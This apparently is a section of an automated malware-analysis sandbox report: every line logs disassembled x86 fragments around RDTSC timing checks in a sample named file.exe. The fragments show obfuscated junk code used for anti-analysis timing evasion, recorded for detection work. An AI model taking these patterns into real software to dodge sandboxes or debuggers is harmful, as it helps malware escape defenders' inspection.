Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11EB77E second address: 11EB784 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11ED6EB second address: 11ED706 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD648C0B454h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 11ED706 second address: 11ED70A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5350E5C second address: 5350E61 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5350E61 second address: 5350E8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov cx, di 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c jmp 00007FD648BC9AD7h 0x00000011 pop ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5350E8B second address: 5350E8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5350E8F second address: 5350E95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5340E5D second address: 5340E7A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B459h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5340E7A second address: 5340ED2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD648BC9AD7h 0x00000009 sub si, 585Eh 0x0000000e jmp 00007FD648BC9AD9h 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 push eax 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FD648BC9AD8h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5340ED2 second address: 5340ED8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5340ED8 second address: 5340EDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5340EDC second address: 5340EE0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5340EE0 second address: 5340EEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5340EEE second address: 5340EF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx esi, di 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5340EF6 second address: 5340F13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD648BC9AD9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5340F13 second address: 5340F17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380814 second address: 5380818 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380818 second address: 538081E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 538081E second address: 538084A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648BC9ACEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD648BC9AD7h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 538084A second address: 538087E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 pushfd 0x00000007 jmp 00007FD648C0B450h 0x0000000c sub esi, 7AA7D0B8h 0x00000012 jmp 00007FD648C0B44Bh 0x00000017 popfd 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f push ecx 0x00000020 pop edi 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 538087E second address: 5380883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380883 second address: 53808BD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B44Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b jmp 00007FD648C0B44Ch 0x00000010 mov dx, si 0x00000013 popad 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FD648C0B453h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 532010E second address: 5320113 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5320113 second address: 5320173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FD648C0B44Dh 0x0000000a adc eax, 63AD1F36h 0x00000010 jmp 00007FD648C0B451h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a jmp 00007FD648C0B44Eh 0x0000001f push eax 0x00000020 pushad 0x00000021 jmp 00007FD648C0B451h 0x00000026 push eax 0x00000027 push edx 0x00000028 call 00007FD648C0B44Eh 0x0000002d pop eax 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5320173 second address: 53201E5 instructions: 0x00000000 rdtsc 0x00000002 movsx ebx, si 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FD648BC9AD8h 0x00000010 adc ax, 1B18h 0x00000015 jmp 00007FD648BC9ACBh 0x0000001a popfd 0x0000001b pushfd 0x0000001c jmp 00007FD648BC9AD8h 0x00000021 sbb esi, 35530578h 0x00000027 jmp 00007FD648BC9ACBh 0x0000002c popfd 0x0000002d popad 0x0000002e mov ebp, esp 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 call 00007FD648BC9ACBh 0x00000038 pop esi 0x00000039 popad 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53201E5 second address: 532021C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B455h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push dword ptr [ebp+04h] 0x0000000c jmp 00007FD648C0B44Eh 0x00000011 push dword ptr [ebp+0Ch] 0x00000014 pushad 0x00000015 movzx esi, bx 0x00000018 push eax 0x00000019 push edx 0x0000001a mov di, 197Ch 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5340BD3 second address: 5340BD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5340BD9 second address: 5340BDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5340BDD second address: 5340C01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FD648BC9AD2h 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5340C01 second address: 5340C07 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5340C07 second address: 5340C32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648BC9AD4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c call 00007FD648BC9ACEh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53407EB second address: 53407EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53407EF second address: 534080B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648BC9AD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 534080B second address: 534082F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B44Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FD648C0B450h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 534082F second address: 5340835 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5340835 second address: 5340863 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B44Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007FD648C0B450h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 movsx edx, si 0x00000017 push ecx 0x00000018 pop edx 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53403CA second address: 53403FE instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FD648BC9AD8h 0x00000008 adc al, 00000058h 0x0000000b jmp 00007FD648BC9ACBh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 xchg eax, ebp 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53403FE second address: 5340404 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5340404 second address: 5340421 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD648BC9AD9h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5340421 second address: 534043F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FD648C0B453h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 534043F second address: 53404E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD648BC9ACFh 0x00000009 sub eax, 4FFFCADEh 0x0000000f jmp 00007FD648BC9AD9h 0x00000014 popfd 0x00000015 movzx esi, dx 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b xchg eax, ebp 0x0000001c pushad 0x0000001d pushfd 0x0000001e jmp 00007FD648BC9AD9h 0x00000023 or cl, FFFFFFC6h 0x00000026 jmp 00007FD648BC9AD1h 0x0000002b popfd 0x0000002c pushfd 0x0000002d jmp 00007FD648BC9AD0h 0x00000032 xor esi, 1976EC68h 0x00000038 jmp 00007FD648BC9ACBh 0x0000003d popfd 0x0000003e popad 0x0000003f mov ebp, esp 0x00000041 push eax 0x00000042 push edx 0x00000043 jmp 00007FD648BC9AD5h 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5350215 second address: 5350265 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, 5CAD1FB4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007FD648C0B44Dh 0x0000000f xor si, 6376h 0x00000014 jmp 00007FD648C0B451h 0x00000019 popfd 0x0000001a popad 0x0000001b xchg eax, ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f pushad 0x00000020 popad 0x00000021 call 00007FD648C0B459h 0x00000026 pop esi 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5350265 second address: 535026B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 535026B second address: 535026F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 535026F second address: 5350273 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380749 second address: 5380759 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD648C0B44Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380759 second address: 538075D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 538075D second address: 5380787 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], ebp 0x0000000b jmp 00007FD648C0B457h 0x00000010 mov ebp, esp 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380787 second address: 538078B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 538078B second address: 53807A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B457h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 536023B second address: 5360277 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 push ebx 0x00000007 jmp 00007FD648BC9ACCh 0x0000000c mov dword ptr [esp], ebp 0x0000000f pushad 0x00000010 mov ecx, 1BF0C46Dh 0x00000015 mov ebx, eax 0x00000017 popad 0x00000018 mov ebp, esp 0x0000001a pushad 0x0000001b mov edx, eax 0x0000001d jmp 00007FD648BC9ACEh 0x00000022 popad 0x00000023 mov eax, dword ptr [ebp+08h] 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360277 second address: 536027B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 536027B second address: 5360281 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360281 second address: 5360287 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360287 second address: 536028B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 536028B second address: 53602E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and dword ptr [eax], 00000000h 0x0000000b jmp 00007FD648C0B44Ah 0x00000010 and dword ptr [eax+04h], 00000000h 0x00000014 pushad 0x00000015 movzx ecx, di 0x00000018 pushfd 0x00000019 jmp 00007FD648C0B453h 0x0000001e sbb ax, 085Eh 0x00000023 jmp 00007FD648C0B459h 0x00000028 popfd 0x00000029 popad 0x0000002a pop ebp 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 popad 0x00000031 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53602E3 second address: 53602E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53602E7 second address: 53602ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5340612 second address: 53406AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648BC9ACAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FD648BC9ACEh 0x00000011 or cx, 7CF8h 0x00000016 jmp 00007FD648BC9ACBh 0x0000001b popfd 0x0000001c mov ah, C2h 0x0000001e popad 0x0000001f push eax 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007FD648BC9AD0h 0x00000027 xor esi, 2AE4D758h 0x0000002d jmp 00007FD648BC9ACBh 0x00000032 popfd 0x00000033 mov edi, eax 0x00000035 popad 0x00000036 xchg eax, ebp 0x00000037 pushad 0x00000038 mov ecx, 554C6607h 0x0000003d pushad 0x0000003e mov si, BA59h 0x00000042 mov ebx, eax 0x00000044 popad 0x00000045 popad 0x00000046 mov ebp, esp 0x00000048 pushad 0x00000049 jmp 00007FD648BC9ACEh 0x0000004e call 00007FD648BC9AD2h 0x00000053 push esi 0x00000054 pop edi 0x00000055 pop eax 0x00000056 popad 0x00000057 pop ebp 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53406AB second address: 53406AF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53406AF second address: 53406B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53406B5 second address: 53406BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5350DBC second address: 5350DC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5350DC2 second address: 5350DFA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B453h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d jmp 00007FD648C0B456h 0x00000012 pop ebp 0x00000013 pushad 0x00000014 mov cl, AFh 0x00000016 push ebx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360021 second address: 5360027 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360027 second address: 536002D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 536002D second address: 5360052 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648BC9AD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360052 second address: 5360056 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360056 second address: 536005C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 536005C second address: 5360079 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD648C0B44Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ax, dx 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5360079 second address: 53600E6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007FD648BC9AD6h 0x0000000b sbb ecx, 03D277E8h 0x00000011 jmp 00007FD648BC9ACBh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov ebp, esp 0x0000001c pushad 0x0000001d mov edi, esi 0x0000001f mov ax, BFD7h 0x00000023 popad 0x00000024 pop ebp 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 mov di, 383Ah 0x0000002c pushfd 0x0000002d jmp 00007FD648BC9ACBh 0x00000032 sbb ah, FFFFFFDEh 0x00000035 jmp 00007FD648BC9AD9h 0x0000003a popfd 0x0000003b popad 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 538001B second address: 538015D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FD648C0B44Fh 0x00000009 adc esi, 0FE62ABEh 0x0000000f jmp 00007FD648C0B459h 0x00000014 popfd 0x00000015 pushfd 0x00000016 jmp 00007FD648C0B450h 0x0000001b jmp 00007FD648C0B455h 0x00000020 popfd 0x00000021 popad 0x00000022 pop edx 0x00000023 pop eax 0x00000024 xchg eax, ebp 0x00000025 pushad 0x00000026 mov bl, ch 0x00000028 pushfd 0x00000029 jmp 00007FD648C0B459h 0x0000002e sbb esi, 148DB106h 0x00000034 jmp 00007FD648C0B451h 0x00000039 popfd 0x0000003a popad 0x0000003b push eax 0x0000003c jmp 00007FD648C0B451h 0x00000041 xchg eax, ebp 0x00000042 jmp 00007FD648C0B44Eh 0x00000047 mov ebp, esp 0x00000049 pushad 0x0000004a jmp 00007FD648C0B44Eh 0x0000004f jmp 00007FD648C0B452h 0x00000054 popad 0x00000055 xchg eax, ecx 0x00000056 jmp 00007FD648C0B450h 0x0000005b push eax 0x0000005c jmp 00007FD648C0B44Bh 0x00000061 xchg eax, ecx 0x00000062 jmp 00007FD648C0B456h 0x00000067 mov eax, dword ptr [76FB65FCh] 0x0000006c jmp 00007FD648C0B450h 0x00000071 test eax, eax 0x00000073 push eax 0x00000074 push edx 0x00000075 pushad 0x00000076 call 00007FD648C0B459h 0x0000007b pop ecx 0x0000007c popad 0x0000007d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 538015D second address: 53801DD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ebx 0x00000005 mov ecx, 116B050Fh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d je 00007FD6BA77D2C2h 0x00000013 pushad 0x00000014 mov ecx, 44448707h 0x00000019 mov bh, cl 0x0000001b popad 0x0000001c mov ecx, eax 0x0000001e jmp 00007FD648BC9ACFh 0x00000023 xor eax, dword ptr [ebp+08h] 0x00000026 pushad 0x00000027 pushfd 0x00000028 jmp 00007FD648BC9AD5h 0x0000002d add ax, 5156h 0x00000032 jmp 00007FD648BC9AD1h 0x00000037 popfd 0x00000038 mov bx, ax 0x0000003b popad 0x0000003c and ecx, 1Fh 0x0000003f push eax 0x00000040 push edx 0x00000041 jmp 00007FD648BC9AD9h 0x00000046 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 53801DD second address: 5380253 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, ax 0x00000006 mov ebx, ecx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ror eax, cl 0x0000000d jmp 00007FD648C0B452h 0x00000012 leave 0x00000013 pushad 0x00000014 mov cx, 11DDh 0x00000018 mov ch, EEh 0x0000001a popad 0x0000001b retn 0004h 0x0000001e nop 0x0000001f mov esi, eax 0x00000021 lea eax, dword ptr [ebp-08h] 0x00000024 xor esi, dword ptr [00F32014h] 0x0000002a push eax 0x0000002b push eax 0x0000002c push eax 0x0000002d lea eax, dword ptr [ebp-10h] 0x00000030 push eax 0x00000031 call 00007FD64D09B65Eh 0x00000036 push FFFFFFFEh 0x00000038 jmp 00007FD648C0B455h 0x0000003d pop eax 0x0000003e pushad 0x0000003f popad 0x00000040 ret 0x00000041 nop 0x00000042 push eax 0x00000043 call 00007FD64D09B672h 0x00000048 mov edi, edi 0x0000004a jmp 00007FD648C0B454h 0x0000004f xchg eax, ebp 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007FD648C0B457h 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380253 second address: 5380259 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5380259 second address: 538025D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
